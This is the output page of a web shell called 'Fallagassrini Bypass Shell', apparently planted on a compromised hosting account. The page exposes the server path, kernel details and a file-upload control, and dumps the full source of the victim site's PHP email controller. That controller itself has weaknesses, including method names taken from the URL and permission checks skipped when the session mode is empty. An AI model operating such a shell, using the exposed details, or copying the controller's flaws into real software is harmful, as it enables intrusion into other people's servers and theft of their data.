? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/oscardraft/application/controllers/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/oscardraft/application/controllers/email.php

<?php

if (!defined('BASEPATH'))
    exit('No direct script access allowed');

class Email extends MY_Controller {

    public function __construct() {
        parent::__construct();
        $this->load->model('mastermodel');
        $this->load->model('emailmodel');
        $this->load->model('studentmodel');
    }

    function get_post_values() {
        $data = array();
        foreach ($_POST as $key => $value) {
            if ($key != "submit") {
                $data[$key] = $this->input->post($key);
            }
        }
        return $data;
    }

    function viewinemailsearch($modelfunction, $page, $pagenum) {
        $output = $this->emailmodel->$modelfunction($pagenum);
        $data['viewinfo'] = $output['results'];
        $this->load->view('email/' . $page . '', $data);
    }

    function addformdisplay($page, $directory, $return_page = '') {
        $data = array();
        $data['return_page'] = $return_page;
        $perm = $this->emailmodel->check_user_permission($_SESSION['current_mode'], $_SESSION['user_id'], 1);
        if (!$perm) {
            $data['msg'] = "Permission Denied";
            $this->load->view('message', $data);
        } else {
            $this->load->view('' . $directory . '/' . $page . '', $data);
        }
    }

    function addinemail($modelfunction, $page) {
        $data = array();
        $postdata = $this->get_post_values();
        $data = $this->emailmodel->$modelfunction($postdata);
        $this->viewinemailsearch($data['resfunction'], $page, $_SESSION['pagenum']);
        $this->load->view('message', $data);
    }

    function deletedata($table, $id, $field) {
        $data = array();
        $perm = $this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['user_id'], 3);
        if (!$perm)
            $data['msg'] = "Permission Denied";
        else
            $data = $this->mastermodel->deletedata($table, $id, $field);
        $arr = array('msg' => $data['msg'], 'res' => $data['res']);
        echo json_encode($arr);
    }

    function edit_page($id, $table, $field, $page) {
        if ($_SESSION['current_mode'] != "") {
            $perm = $this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['user_id'], 2);
        } else {
            $perm = 1;
        }
        if (!$perm) {
            $data['msg'] = "Permission Denied";
            $this->load->view('message', $data);
        } else {
            $data['viewinfo'] = $this->mastermodel->get_data_srow($table, $id, $field);
            $data['id'] = $id;
            $this->load->view('email/' . $page, $data);
        }
    }

    function single_page($id, $table, $field, $page) {
        if ($_SESSION['current_mode'] != "") {
            $perm = $this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['user_id'], 0);
        } else {
            $perm = 1;
        }
        if (!$perm) {
            $data['msg'] = "Permission Denied";
            $this->load->view('message', $data);
        } else {
            $data['viewinfo'] = $this->mastermodel->get_data_srow($table, $id, $field);
            $data['id'] = $id;
            $this->load->view('email/' . $page, $data);
        }
    }

    function loademaillist($modelfunction, $page, $pagenum = "") {
        $postdata = $this->get_post_values();
        $output = $this->emailmodel->$modelfunction($postdata);
        if ($output['results'] != "") {
            $data['viewinfo'] = $output['results'];
            $this->load->view('email/' . $page, $data);
        } else {
            $data['msg'] = "No records found";
            $this->viewinemailsearch('search_send_email', 'view_send_email', $_SESSION['pagenum']);
            $this->load->view('insertfailure', $data);
        }
    }

    function singleemailreport($id, $table, $field, $page) {
        if ($_SESSION['current_mode'] != "") {
            $perm = $this->mastermodel->check_user_permission($_SESSION['current_mode'], $_SESSION['user_id'], 0);
        } else {
            $perm = 1;
        }
        if (!$perm) {
            $data['msg'] = "Permission Denied";
            $this->load->view('message', $data);
        } else {
            $data['emailreport'] = $this->mastermodel->get_data_srow('emailreport', $id, 'email_id');
            $data['email_receipents'] = $this->mastermodel->get_data('email_receipents', $id, 'email_id');
            $data['id'] = $id;
            $this->load->view('email/' . $page, $data);
        }
//        $this->load->view('email/single_email_report',$data);
    }

    function gettemplatecont($template_id) {
        $content = $this->mastermodel->get_single_field_value('emailtemplate', 'template_contents', 'template_id', $template_id);
        if (empty($content))
            $content = "";
        echo $content;
    }

    function gettemplatesubj($template_id) {
        $sub = $this->mastermodel->get_single_field_value('emailtemplate', 'template_subject', 'template_id', $template_id);
        if (empty($sub))
            $sub = "";
        echo $sub;
    }
}
/* End of file master.php */
/* Location: ./application/controllers/master.php */

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net